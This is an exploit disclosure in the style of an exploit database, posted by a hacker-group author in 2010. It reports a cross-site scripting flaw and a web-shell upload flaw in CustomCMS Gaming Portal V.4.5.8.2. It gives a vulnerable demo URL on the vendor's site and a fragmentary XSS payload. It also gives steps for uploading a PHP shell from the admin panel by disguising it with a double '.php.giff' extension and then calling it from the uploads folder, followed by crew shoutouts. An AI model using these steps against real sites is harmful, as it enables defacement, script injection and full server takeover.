PLz chk it 

# Exploit Title: XSS and shell upload Vulnerability in CustomCMS Gaming Portal V.4.5.8.2
# Date: 25-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : []

          ------------------------------------------------------------------------------------------------------------------
            XSS and shell upload Vulnerability CustomCMS Gaming Portal V.4.5.8.2
                            Vendor:http://customcms.net/
          ------------------------------ Author:Sid3^effects-------------------------------------------------------
  



What is Custom CMS Gaming?

Custom CMS Gaming is a Content Management System geared towards all Gamers that would like 

to maintain and create fully functional gaming sources. Whether you're interested in running 

your gaming site as a hobby or as a serious online venture, Custom CMS Gaming makes it easy 

for all users to create & manage the Gaming website they've always dreamed of. 

 PRICE : 55$ 
--------------------------------------------------------------------------------------------

    3xpl0it : XSS (cross site scripting ) 
       
    XSS is found in the following link..

 DEMO URL :
        http://customcms.net/demo/sendtofriend.php?url=
---------------------------------------------------------------------------

        Attack Pattern: '"--> 
    
---------------------------------------------------------------------------
   
          3xpl0it : Shell upload 
      
        You can upload shell once you get into admincp 
 
    * Rename the shell and upload with the extension .php.giff
        
       GOTO  http://site/images/uploads/misc/ur_shell.php.giff.php
      
   

ShoutZ :
------- 
                   ---Indian Cyber warriors--Andhra hackers-- 

Greetz :
--------
 =--*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--Mayur--=